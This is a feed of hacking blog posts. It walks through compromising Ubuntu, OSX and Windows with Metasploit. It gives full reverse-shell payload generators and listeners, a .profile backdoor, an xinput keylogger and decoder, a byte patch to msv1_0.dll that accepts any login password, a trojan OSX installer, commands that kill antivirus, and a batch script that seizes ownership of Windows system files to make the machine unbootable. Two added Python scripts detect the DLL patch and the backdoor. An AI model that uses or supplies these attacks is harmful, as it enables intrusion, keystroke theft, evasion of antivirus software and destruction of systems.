Channel: Astr0baby's not so random thoughts _____ rand() % 100;

Comodo AV and Sandbox bypass

Actually, I think that Comodo's sandbox approach is very good. Any unknown binary is automatically distrusted and placed into the sandbox. So if we, for example, bypass its antivirus heuristics and manage to get a shell on the target, we won't be able to do much at the system level, as the whole exploit process is separated off by the sandbox.

It took a while to defeat the sandbox, and for a time Comodo was on my top list of AV products. This method can bypass Defense+ in paranoid mode and the antivirus heuristics. The Metasploit reverse payload is slightly customized, of course, in order to get by the AV. I cannot disclose the details of the sandbox escape, in order to protect the innocent and to prevent abuse by script kiddies. Below is a demonstration of how the attack is performed, featuring Viktor Cleaner giving the final strike.

In case you wonder what strange language the Windows 7 is in: it's Czech.

 



圖勝萬言 (A picture is worth ten thousand words)

A little video update on the Comodo sandbox bypass. More abracadabra added for special effects, starring Matt A. Sploit and comrade Viktor.

* One picture is worth more than ten thousand words.
– Chinese proverb


Executable Ascii files pt. 2

Here is something very old, but still very cool. Attached are txt files that, when saved as .com (16-bit MS-DOS executables), will run. Pure magic. It works in DOS, Win9x, Win2k and WinXP SP3. In Windows 7 (32-bit) you can only run console apps, as ntvdm.exe won't allow the app to take over the VGA.

I have encoded a few text files which can be run in a lab environment (remember, these are unknown ASCII executables after all!). I am also including the original com2txt ASCII binary and the exe2com ASCII binary for further encoding experiments.

So here is what com2txt looks like:

Download here and rename to com2txt.com: com2txt.doc

In case you need to convert a 16-bit EXE into a COM, you can use this: exe2com

These programs were not created by me but by a Japanese author a long time ago. Anyway, the source code of the converter can be found online. I am including some example ASCII executables here to play with (old games):

blocks  mario pingu passw

Remember to save these files with the .COM extension.

Also, Kaspersky Antivirus 2013 was released a few days back, so I've tested it here:

“I need a jug of wine and a book of poetry,
Half a loaf for a bite to eat,
Then you and I, seated in a deserted spot,
Will have more wealth than a Sultan’s realm.”

 

 


Fun with msv1_0.dll in Windows 7 SP1 64bit

Recently I was able to look at the 64-bit version of Windows 7 and check MsvpPasswordValidate within msv1_0.dll to see whether it is possible to NOP out the TRUE/FALSE check on the RtlCompareMemory result, where the hashes are compared in memory.

It is actually much simpler than the Win7 SP1 32-bit version of the library; with so many fewer objects in the IDA view it was very easy to find the function and replace the jump with NOPs.

So in my demonstration I'm using IDA Pro (for 64-bit DLLs) and a patch utility called ida_patcher.c (download it from IDA and compile it using Visual Studio Express 2010) to diff the results against msv1_0.dll.

So we search for the function MsvpPasswordValidate within msv1_0.dll and check the following section in the IDA view:

Looks simple, right? Next we need to highlight the jnz loc_7FF735183A4 and switch to hex view so that we can see the part which we can patch, like so:

Next we patch the highlighted hex string with NOPs, so instead of 0F 85 7C 80 00 00 we will have 90 90 90 90 90 90.

Then we produce a DIFF file with our changes, which we can then apply using ida_patcher.exe.

So the final command would be: ida_patcher.exe -i msv1_0.dll -p msv1_0.dll.patch

The resulting msv1_0.dll (which we have copied from C:\windows\system32 to another location first, right?) can be used to authenticate with any password against Win7 64 SP1. For the test's sake I've just replaced the original msv1_0.dll with the patched one, and I can log in with any password imaginable. Nothing groundbreaking, but it could still be used as a nice magic trick to amuse kids in your local IT class.

 


Fun with msv1_0.dll in Windows 8 64bit

I've always wondered what this logo reminds me of… wait, it was the old Greek state flag from 1822 to 1969. The colors were used in the Greek revolution, when they fought the Ottoman Empire.

OK, now we move on to the latest OS from Microsoft: Windows 8 Pro 64-bit. There seems to be a big void in the description of the various functions inside the library, which makes debugging harder, but not impossible. I had to go manually through all the functions to check for our RtlCompareMemory friends and find the correct section which needs to be patched. There seems to be incomplete info on the Microsoft Symbol Server for the PDB of msv1_0.dll (or at least this is how I understand it).

So after careful analysis I came up with the following anonymous function that should correspond to MsvpPasswordValidate:

It is: sub_18001014C

Next we look for the RtlCompareMemory call and patch our jnz with NOPs; in this case the block starts at loc_1800101F0 and the jump is jnz_loc 18001B4B7.

So we open it in hex view and do our modifications of jnz_loc 18001B4B7:

Produce a diff and patch the file, reboot to Linux, copy over C:\windows\system32\msv1_0.dll and reboot; any password should now work to log in to the system.

msv1_0.dll
0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90

Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test it in your lab.
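The patch listing above, and the equivalent six-byte NOP patch in the Windows 7 post earlier in this feed, give a defender a concrete thing to look for: a copy of msv1_0.dll whose conditional jump after the hash comparison has been replaced by 0x90 bytes. The following script is an added example and is not code from the blog or from ida_patcher. It parses the listing format shown above (first line the target file, then one "offset: original patched" hex line per byte) and classifies a file image as ORIGINAL, PATCHED or UNKNOWN at those offsets; it only reads, never writes. The two sample images at the bottom are constructed stand-ins, not the real DLL.

```python
"""Check whether a file image carries the msv1_0.dll byte patch listed above.

Added example for this feed, not code from the blog or from ida_patcher.
It parses the listing format shown in the post (first line: target file;
then "offset: original patched", one byte per line, all hex) and classifies
an image as ORIGINAL, PATCHED or UNKNOWN at the listed offsets. It never
writes anything. The two sample images at the bottom are constructed.
"""
import re
from typing import Dict, Tuple

# Listing copied verbatim from the post above (Windows 8 64-bit build).
PATCH_LISTING = """\
msv1_0.dll
0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90
"""

_LINE_RE = re.compile(r"^([0-9A-Fa-f]{1,8}):\s+([0-9A-Fa-f]{2})\s+([0-9A-Fa-f]{2})$")


def parse_listing(text: str) -> Tuple[str, Dict[int, Tuple[int, int]]]:
    """Return (target file name, {file_offset: (original_byte, patched_byte)})."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 2:
        raise ValueError("listing needs a file name and at least one byte line")
    table: Dict[int, Tuple[int, int]] = {}
    for ln in lines[1:]:
        m = _LINE_RE.match(ln)
        if not m:
            raise ValueError("malformed listing line: %r" % ln)
        table[int(m.group(1), 16)] = (int(m.group(2), 16), int(m.group(3), 16))
    return lines[0], table


def classify_image(image: bytes, table: Dict[int, Tuple[int, int]]) -> str:
    """ORIGINAL if every listed offset holds the pre-patch byte, PATCHED if
    every offset holds the post-patch byte, otherwise UNKNOWN (a different
    build of the DLL, a partial patch, or an image too short for the offsets)."""
    if not table:
        raise ValueError("empty patch table")
    all_orig = all_patched = True
    for off, (orig, new) in table.items():
        if off >= len(image):
            return "UNKNOWN"
        all_orig = all_orig and image[off] == orig
        all_patched = all_patched and image[off] == new
    if all_orig:
        return "ORIGINAL"
    if all_patched:
        return "PATCHED"
    return "UNKNOWN"


def patched_sequence(table: Dict[int, Tuple[int, int]]) -> bytes:
    """The bytes the patch writes, in offset order (six 0x90 NOPs here)."""
    return bytes(new for _, (_, new) in sorted(table.items()))


def check_file(path: str, listing: str = PATCH_LISTING) -> str:
    """Classify a file on disk; run this against a copy, not the live DLL."""
    _, table = parse_listing(listing)
    with open(path, "rb") as fh:
        return classify_image(fh.read(), table)


def _sample_image(patched: bool) -> bytes:
    """Constructed 64 KiB stand-in for the DLL: filler bytes with the six
    listed offsets set to either the original or the NOP bytes."""
    _, table = parse_listing(PATCH_LISTING)
    buf = bytearray(b"\xcc" * 0x10000)
    for off, (orig, new) in table.items():
        buf[off] = new if patched else orig
    return bytes(buf)


SAMPLE_ORIGINAL = _sample_image(patched=False)
SAMPLE_PATCHED = _sample_image(patched=True)

if __name__ == "__main__":
    _, tbl = parse_listing(PATCH_LISTING)
    print("sample original ->", classify_image(SAMPLE_ORIGINAL, tbl))
    print("sample patched  ->", classify_image(SAMPLE_PATCHED, tbl))
```

This byte check is only a quick triage for the specific patch shown; the authoritative check on a real system is the file's Authenticode signature (for example Get-AuthenticodeSignature in PowerShell, or Sysinternals sigcheck), which any byte modification of the DLL invalidates, and a known-good hash baseline of System32.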


Numerology of 32 and 64

Oh boy,

I just love numbers and all sorts of combinations. It creates a never-ending space of possibilities and meanings. Take anything and you can always relate to numbers in one way or the other. Like the numbers 32 and 64.

Year 32 (AD)

Year 32 (XXXII) was a leap year starting on Tuesday of the Julian calendar. At the time, it was known as the Year of the Consulship of Ahenobarbus and Camillus (or, less frequently, year 785 Ab urbe condita).
- Christ is crucified.

Year 64 (AD)

Year 64 (LXIV) was a leap year starting on Sunday of the Julian calendar. At the time, it was known as the Year of the Consulship of Bassus and Crassus (or, less frequently, year 817 Ab urbe condita).
- Great fire of Rome under the Emperor Nero; the persecution of early Christians started.
 

Now back to computers: 8-bit, 16-bit, 32-bit, 64-bit… I've slightly modified Viktor Cleaner to work in a Windows 64-bit environment, as the previous release was not able to unload 64-bit antivirus. Now it can. You can find the file attached; it is encrypted again, and guess what the password is.

viktor64.tar.bz2

Here is a video demonstration of Windows 7 SP1 64-bit with Dr.Web antivirus being unloaded and bypassed.

Also here is an example of Windows 8 64-bit with BitDefender 2013 being bypassed and unloaded.

 

Also, I've included a little video demonstration of an msv1_0.dll patching session against Windows Server 2012. This trick won't work if the server takes the role of a domain controller, but any other role should be OK. Just a note for computers that are joined to a domain: in order to unlock any account, the system must not be able to authenticate against a reachable domain, so the locally cached credentials are used, and we can trick that via the patched msv1_0.dll. It would be fun to see if it would be possible to patch kerberos.dll, for example, to allow a so-called "Happy Hour" on a domain.

As always, test these things in your lab environment and virtual machines; it's like playing a computer game after all.

P.S.

2012 (MMXII) is a leap year that started on a Sunday and is the current year. In the Gregorian calendar, it is the 2012th year of the Common Era (CE) and Anno Domini (AD) designations, the 12th year of the 3rd millennium and of the 21st century, and the 3rd of the 2010s.

Let's remember some people…

People forget, so let's go back and bring back some truly random thoughts.

These people came from different nationalities, religions and classes; fighting for what is right knows no race, color or creed.

France Bloch-Serazin was beheaded in Hamburg on 12 February 1943, just before her 30th birthday, for her active role in the French resistance.

In May 1939, she married Frédo Sérazin, a metallurgist working at the automobile factory Hispano-Suiza. Together they had one son, Roland. Frédo was arrested in February 1940 by the Daladier government. After the installation of the Vichy regime, she was barred from her laboratory as a Jewish communist and had to work as a tutor in order to survive. In 1941, she participated in the first groups of the communist resistance led by Raymond Losserand and installed a small, rudimentary laboratory in her two-room apartment on the Place du Danube. Working with Colonel Dumont, she made grenades and detonators used in attacks organized by the youth resistance at the end of August 1941.
France Bloch was arrested by the French police on May 16, 1942. After 4 months of interrogation and torture, she was condemned to death by a German military tribunal along with 18 co-conspirators, who were all executed immediately. Bloch herself, meanwhile, was deported to Germany and imprisoned in a fortress at Lübeck. She was subjected to further torture there, and was decapitated by axe in Hamburg on February 12, 1943.
 
Irena Bernaskova was the first Czech woman sentenced to death by the People's Court (Volksgerichtshof) for anti-Nazi activities. She was involved in the publication of the largest illegal resistance periodical, "V Boj" (Into Battle). She was sentenced to death on 5 March 1942 and beheaded in Plötzensee prison on 26 August 1942 at the age of 38. A brave woman, she was the Czech equivalent of Sophie Scholl.

Marie Kuderikova was a Czech student actively involved in the Czech resistance to the Nazi occupation of Czechoslovakia in WWII. She was arrested by the Gestapo in 1941, sentenced to death and beheaded in Wroclaw on 26 March 1943, two days after her 22nd birthday.

Franz Reinisch, a Catholic priest, was beheaded on 21 August 1942 in Plötzensee prison at the age of 39 for his anti-Nazi sermons and his refusal to serve in the military and to give an oath of allegiance.

 


Hacking Ubuntu 12.04 LTS using Metasploit

This was a particularly fun exercise, and I decided to share the details as well as the scripts that I've created and modified from various sources. First of all, there are very few articles describing the Metasploit meterpreter used against Linux (Ubuntu in this case), so I decided to fill the gap and make this walk-through from the point where the target runs our binary payload to a complete root compromise of the target system. So this is what I have used in my scenario:

  • Ubuntu 12.04 LTS 32bit default installation with all updates running inside a VM
  • VirtualBox
  • Metasploit framework – current
  • Debian Squeeze 64bit as my host platform

So first of all I have prepared a simple little ELF binary generator in bash to make things easier. Place this file in the Metasploit root folder:

#!/bin/bash
clear
echo "************************************************"
echo "  LINUX ELF BINARY GENERATOR FOR METASPLOIT    *"
echo "************************************************"
echo -e "What IP are we gonna use  ex. 192.168.0.1?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Generate the staged reverse_tcp ELF; write (not append, as >> would
# corrupt the binary on a second run) it to a file called Executive
./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port R | ./msfencode -t elf -e x86/shikata_ga_nai > Executive
echo "Executive binary generated.."
chmod u=rwx Executive
ls -la Executive

OK, now we have an ELF binary called Executive which we will use on the target Ubuntu system.

Next we need to start a listener for our reverse meterpreter shell; again, place this file in the root folder of Metasploit.

#!/bin/bash
clear
echo "*********************************************"
echo "   METASPLOIT LINUX METERPRETER LISTENER    *"
echo "*********************************************"
echo "Here is a network device list available on your machine"
# Interface names from /proc/net/dev, skipping the two header lines
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IP="" # store IP (the original had the typo IO="")
case $OS in
   Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port E

So once we have the listener interface up and running we can move onto the target Ubuntu system.

I got some feedback asking how the executable got to the target in the first place. Well, I copied it there myself, being the potential victim myself. This is not a real-world scenario, but rather a simulation of what is possible. I do not wish to go into details on how to push the binary to the user; it is not in the scope of this exercise. But bear in mind that there are a few ways to do it.

Pictures say more than words, so here is a screenshot of the whole process:

So now we are ready to execute the "unknown" binary on the target computer. When I double-click the Executive binary nothing happens, but we get a reverse shell on our listener.

So what now? We have a shell, but we want root, right? The next few steps get more interesting as we go deeper into the problem. We will plant a backdoor into the home folder of the current user and execute it via the .profile script when the user logs in. So we first download the .profile from the home directory:

We modify the .profile locally to include the backdoor by adding a launcher for the Executive binary, like so: ./.executive & (make sure it is executable).

And finally we upload the modified .profile to the target, like so:

Next we upload the ELF binary to the home folder, rename it to .executive and make sure it is RWX.

So now we have a permanent backdoor planted, and every time the target logs in, his .profile silently executes the ELF binary called .executive.

So now what? We have a user shell and we want more; we want root, right? So let's get root.

Ubuntu ships with xinput, so we can abuse it as a keylogger and record every keystroke the user types while in his X session. I have developed a special set of scripts usable with Metasploit to make the whole process fast and easy. So now we need to upload a keylog.sh script to the target and execute it.

Here is the source for keylog.sh:

#!/bin/bash
export DISPLAY=:0.0
xinput list
echo -e "KBD ID ?"
read kbd 
xmodmap -pke > /tmp/.xkey.log
script -c "xinput test $kbd" | cat >> /tmp/.xkey.log & 
echo "The keylog can be downloaded from /tmp/.xkey.log" 
echo "Use the meterpreter download function" 
echo "Press CTRL+C to exit this session, keylogger will run in background"

This script is pretty self-explanatory: we set the DISPLAY, get the xinput ID of the keyboard, dump the xmodmap to /tmp/.xkey.log and append any keystrokes to the same /tmp/.xkey.log file. After a while we need to download /tmp/.xkey.log to see if there are any captured keystrokes and decode them.

So we upload it and run it:

We put in the KBD ID; in this case it is id=10.

And terminate the shell session, as the keylogger is running in the background. After a while, when we think that the log file with keystrokes is full, we download .xkey.log from the /tmp folder, like so:

Next we need to decode the content of .xkey.log so it is readable. I have created a special decoder script that can do just that. Again, .xkey.log needs to be in the path of the decoder script:

#!/bin/sh 
cat .xkey.log | grep keycode > xmodmap.pke
cat .xkey.log | grep 'key p' > xlog 
rm -f .xkey.log 
#Generating some Python to do the decoding
echo 'import re, collections, sys' > decoder.py 
echo 'from subprocess import *' >> decoder.py
echo 'def keyMap():' >> decoder.py
echo '   table = open("xmodmap.pke")' >> decoder.py
echo '   key = []' >> decoder.py
echo '   for line in table:' >> decoder.py
echo "      m = re.match('keycode +(\d+) = (.+)', line.decode())" >> decoder.py
echo '      if m and m.groups()[1]:' >> decoder.py
echo '         key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])' >> decoder.py
echo '   return key' >> decoder.py
echo 'def printV(letter):' >> decoder.py
echo '      key=keyMap();' >> decoder.py
echo '      for i in key:' >> decoder.py
echo '              if str(letter) == i.split("_____")[1]:' >> decoder.py
echo '                     return i.split("_____")[0]' >> decoder.py
echo '      return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >> decoder.py
echo '        print "Usage: %s FILE" % sys.argv[0];' >> decoder.py
echo '        exit();' >> decoder.py
echo 'else:' >> decoder.py
echo '        f = open(sys.argv[1])' >> decoder.py
echo '        lines = f.readlines()' >> decoder.py
echo '        f.close()' >> decoder.py
echo '        for line in lines:' >> decoder.py
echo "                m = re.match('key press +(\d+)', line)" >> decoder.py
echo '                if m:' >> decoder.py
echo '                          keycode = m.groups()[0]' >> decoder.py
echo '                          print (printV(keycode))' >> decoder.py

echo 'Please see LOG-keylogger for the output......' 
python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger 
rm -f LOG 
rm -f xmodmap.pke 
rm -f decoder.py
rm -f xlog 
cat LOG-keylogger

So when we run this script (Python is needed) we can see something like this:

So if the user elevates via sudo, we get the password in this log. So how do we do sudo su in the meterpreter shell? Normally we cannot, as you can see here in the screenshot:

There is a trick, however, that can bypass the no-TTY problem, and that is Python. Python is shipped by default on Ubuntu 12.04 LTS, so we can type this:

python -c 'import pty;pty.spawn("/bin/bash")' and we can elevate to root via sudo su

And that is the end. We now have root and own the box. I hope you have enjoyed reading this as much as I have enjoyed creating it. CentOS and Debian Squeeze, for example, do not ship the xinput binary by default, so this attack is not possible there.

A quick and dirty solution is just # chmod a-x /path/to/xinput to prevent keyboard sniffing.

UPDATE: even if the xinput binary is not present on the system, we can upload a generic one to the target and execute it via the meterpreter shell. I have tested the Ubuntu 12.04 LTS 32-bit xinput against Debian Squeeze 64-bit; it works and we can sniff the keyboard.
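Both post-exploitation steps described in this post leave visible traces on the host, which is what a defender should be looking for rather than the presence of the xinput binary (the UPDATE above shows why removing or chmod-ing it is not enough): the persistence step writes a background launch of a hidden executable into ~/.profile, and the keylogger step leaves an `xinput test` process (wrapped by script(1)) running in the user's session. The following audit script is an added example and not part of the original post; it runs those two checks over a constructed .profile and constructed `ps -eo pid,user,args` output, and, when executed directly on a Linux host, over the real startup files and process list. The file names, the wrapper list and the sample content are assumptions for illustration.

```python
"""Audit a Linux host for the two artefacts described above: a hidden
executable launched in the background from a shell startup file, and an
`xinput test` keystroke capture. Added example, not the blog's code;
the samples below are constructed.
"""
import re
from typing import Dict, List

# Startup files a login or interactive shell sources (assumed list).
STARTUP_FILES = (".profile", ".bash_profile", ".bash_login", ".bashrc",
                 ".xprofile", ".xsessionrc")

# Process command-line patterns left by the keylogger step of the post.
KEYLOG_PATTERNS = [
    (re.compile(r"\bxinput\s+test(?:-xi2)?\b"), "xinput keystroke capture"),
    (re.compile(r"\bscript\s+-c\s+['\"]?xinput"), "script(1) wrapping xinput"),
    (re.compile(r"\bxmodmap\s+-pke\b"), "keymap dump used to decode the log"),
]


def background_dotfile_launches(text: str) -> List[str]:
    """Return startup-file lines that run a dot-prefixed (hidden) program in
    the background, e.g. `./.executive &` or `$HOME/.cache/.x >/dev/null 2>&1 &`."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()          # drop trailing comments
        if not line.endswith("&") or line.endswith("&&"):
            continue                                  # not a background job
        # Only the last command of a `a; b && c &` chain is backgrounded.
        last = re.split(r"\s*(?:;|&&|\|\||\|)\s*", line[:-1].strip())[-1]
        tokens = last.split()
        if len(tokens) > 1 and tokens[0] in ("nohup", "setsid", "exec"):
            tokens = tokens[1:]                       # look past common wrappers
        if tokens and tokens[0].rsplit("/", 1)[-1].startswith("."):
            hits.append(raw)
    return hits


def keystroke_capture_processes(ps_lines: List[str]) -> List[Dict[str, str]]:
    """ps_lines: lines of `ps -eo pid,user,args` (header optional).
    Returns one record per process whose command line matches a pattern."""
    found = []
    for ln in ps_lines:
        parts = ln.strip().split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue                                  # header or malformed line
        pid, user, args = parts
        for pattern, why in KEYLOG_PATTERNS:
            if pattern.search(args):
                found.append({"pid": pid, "user": user, "args": args, "why": why})
                break
    return found


# Constructed samples: a stock Ubuntu-style .profile with the backdoor line
# appended, and a ps listing with the keylogger from the post running.
SAMPLE_PROFILE = """\
# ~/.profile: executed by the command interpreter for login shells.
if [ -n "$BASH_VERSION" ]; then
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi
PATH="$HOME/bin:$PATH"
./.executive &
"""
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
 1337 alice    script -c xinput test 10
 1338 alice    xinput test 10
 1400 alice    /usr/bin/gnome-terminal
"""

if __name__ == "__main__":
    import os
    import subprocess
    print("sample profile:", background_dotfile_launches(SAMPLE_PROFILE))
    print("sample ps:", keystroke_capture_processes(SAMPLE_PS.splitlines()))
    for name in STARTUP_FILES:                        # live check of this host
        path = os.path.join(os.path.expanduser("~"), name)
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                for hit in background_dotfile_launches(fh.read()):
                    print("%s: %s" % (path, hit))
    try:
        ps = subprocess.run(["ps", "-eo", "pid,user,args"], capture_output=True,
                            text=True, check=True).stdout
        for rec in keystroke_capture_processes(ps.splitlines()):
            print("pid %(pid)s (%(user)s): %(args)s  [%(why)s]" % rec)
    except (OSError, subprocess.CalledProcessError) as exc:
        print("ps unavailable:", exc)
```

The startup-file check is a heuristic (it ignores quoting and heredocs), so treat its output as a triage list; the process check is the more reliable of the two, since `xinput test` has no legitimate reason to run unattended in a user session.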

Here is a video presentation of the above attack:

"While we teach, we learn" (Seneca)



Hacking OSX using Metasploit

OK, the next interesting exercise was with OSX. I don't have a powerful machine to run the latest Mountain Lion, so I have used Snow Leopard 10.6.2 instead. These findings are not new; the main idea was taken from Darkoperator's blog, but I will show some modifications and alternatives that I have come up with.

Most importantly, I am doing the demo on OSX running Kaspersky Antivirus for Mac. At this point Kaspersky flags some payloads and not others. So it was fun bypassing it and unloading it from memory. By the way, it is much easier on OSX than on Windows.

So first we have an OSX 32-bit reverse shell generator to create the source code for our executable:

#!/bin/bash
clear
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "        TESTING FOR OSX 32bit tested on 10.6                "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
# msfencode's default (ruby-style) listing looks like: buf = "\x.." +  "\x.." ...
./msfpayload   osx/x86/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/call4_dword_xor  > test.c
mv test.c ShellCode
cd ShellCode
# Drop the line-continuation plus signs, then turn the ruby variable into a C array
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c
cat ready.c >> temp.c
echo ";" >> temp.c
# Cast the byte array to a function pointer and call it
echo "int main(void) { ((void (*)())micro)();" >> temp.c
echo "}" >> temp.c
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it using gcc on OSX"
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

This will generate a C source file called final.c which we will compile using GCC on OSX (I am not aware of any cross-compiler environment to compile Mach-O binaries in Linux).

compile.macho

Next we need to generate and obfuscate a Java meterpreter JAR file. Java is present on OSX, so it is a perfect method of deploying the meterpreter to the target. So here is the script that generates it:

#!/bin/bash
clear
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "        TESTING FOR OSX 32bit tested on 10.6                "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
# The java payload is emitted as a ready JAR, no encoding step needed
./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

Now, the resulting test.jar will get flagged by Kaspersky AV, so we need to change it a little. For this I chose to use ProGuard 4.8. I will show you here what I did to get by the AV heuristics with the JAR file.

The next screenshots show the settings I used to get past KAV on OSX.


So now that we have the obfuscated JAR file, we can copy it over to the OSX machine, because we need to pack it along with the first Mach-O reverse shell payload.

The next step is to create a PKG for OSX that will include both files generated previously. I have used the open-source Iceberg to create the PKG. The next screenshots show the process.


What is important is to include the script install.sh in a project path in Iceberg. The install.sh script looks like this:

#!/bin/sh
/Applications/Utilities/OSXBin &

So when we execute the PKG, this script calls the OSXBin binary which we compiled first using GCC on OSX. We have also included the JAR file for execution once we get the reverse shell.

Now we need to set up two listeners on our attacking machine; I use these scripts:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo "Here is a network device list available on your machine"
# Interface names from /proc/net/dev, skipping the two header lines
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IP="" # store IP (the original had the typo IO="")
case $OS in
   Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "      starting the shell listener.."
./msfcli exploit/multi/handler PAYLOAD=osx/x86/shell_reverse_tcp LHOST=$IP LPORT=$port E

And the Java listener:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo "Here is a network device list available on your machine"
# Interface names from /proc/net/dev, skipping the two header lines
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IP="" # store IP (the original had the typo IO="")
case $OS in
   Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST=$IP LPORT=$port E

We need to specify different ports, of course, for the two listeners; I use 8080 and 8081.

So when the target user installs the PKG on OSX and enters the password at the prompt, we get a reverse root shell, from which we can execute the Java meterpreter JAR file that has been dumped into /Applications/Utilities/obfuscated.jar.

We execute it like so:

#java -jar /Applications/Utilities/obfuscated.jar

And we get a meterpreter shell opening in a new window, running with root privileges! Next we kill the antivirus by going into the AV directory where the main kav binary resides and renaming it to something else, like old.kav:

cd /Library/"Application Support"/"Kaspersky Lab"/KAV/Binaries
mv kav old.kav

Next we just kill -9 the kav PIDs and that is all. The renaming step is necessary; otherwise the kav process will respawn immediately after being killed.

I have made a video of the whole process, which you can see here:


Protected: DEP FUD executable generator for Metasploit

This post is password protected. You must visit the website and enter the password to continue reading.


Dark side of the …. ?

 


A prism can be used to break light up into its constituent spectral colors (the colors of the rainbow). Prisms can also be used to reflect light, or to split light into components with different polarizations. Or they can be used for something completely different …

I just love the Fabulous Furry Freak Brothers comix. I believe this picture is from the mid 80s. Nothing has changed much, I guess; people just don't remember. And don't forget, boys and girls, that…

And here is the last thought on the subject…


Red and white, blue suede shoes,
I’m Uncle Sam, how do you do?
Gimme five, I’m still alive, ain’t no luck,
I learned to duck. Check my pulse, it don’t change.
Stay seventy-two come shine or rain.
Wave the flag, pop the bag, rock the boat, skin the goat.
Wave that flag, wave it wide and high.
Summertime done, come and gone, my, oh, my.

 

Windows equivalent of rm -rf /

For today's exercise I have created a scenario where the target Windows system needs to be nuked after a successful compromise so that it cannot boot back into Windows. Being a Linux user, I have always liked the possibility of nuking the mounted root partition with a single simple command like "rm -rf /". After all, it is my system and I can zap it whenever I want to. In Windows it is a little harder, and I am sure there are tons of how-tos available on the Internet. I needed something stealthy which would run via the meterpreter shell in the background of the target Windows box. So obviously nuking the user's files is not a good idea. We just want to make sure that upon the next reboot the machine will barf up a "Black Screen of Death".

So we have "bypassed" all the pesky AVs and have a nice admin shell:


Next we upload the following batch file to the target system; let's call it nuke.bat:

@echo off
echo Taking ownership....
takeown /f c:\* >nul 2>nul
takeown /f %windir%\* >nul 2>nul
takeown /f %windir%\system32 >nul 2>nul
takeown /f %windir%\system32\* >nul 2>nul
takeown /f %windir%\system32\drivers >nul 2>nul
takeown /f %windir%\system32\drivers\*  >nul 2>nul
takeown /f c:\recovery >nul 2>nul
takeown /f c:\recovery\* >nul 2>nul
takeown /f c:\perflogs >nul 2>nul
takeown /f c:\perflogs\* >nul 2>nul
takeown /f "c:\system volume information\" >nul 2>nul
takeown /f "c:\system volume information\*" >nul 2>nul

icacls c:\* /grant administrators:f /t >nul 2>nul
icacls %windir% /grant administrators:f /t >nul 2>nul
icacls %windir%\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32 /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul
icacls c:\recovery /grant administrators:f /t >nul 2>nul
icacls c:\recovery\* /grant administrators:f /t >nul 2>nul
icacls c:\perflogs /grant administrators:f /t >nul 2>nul
icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul
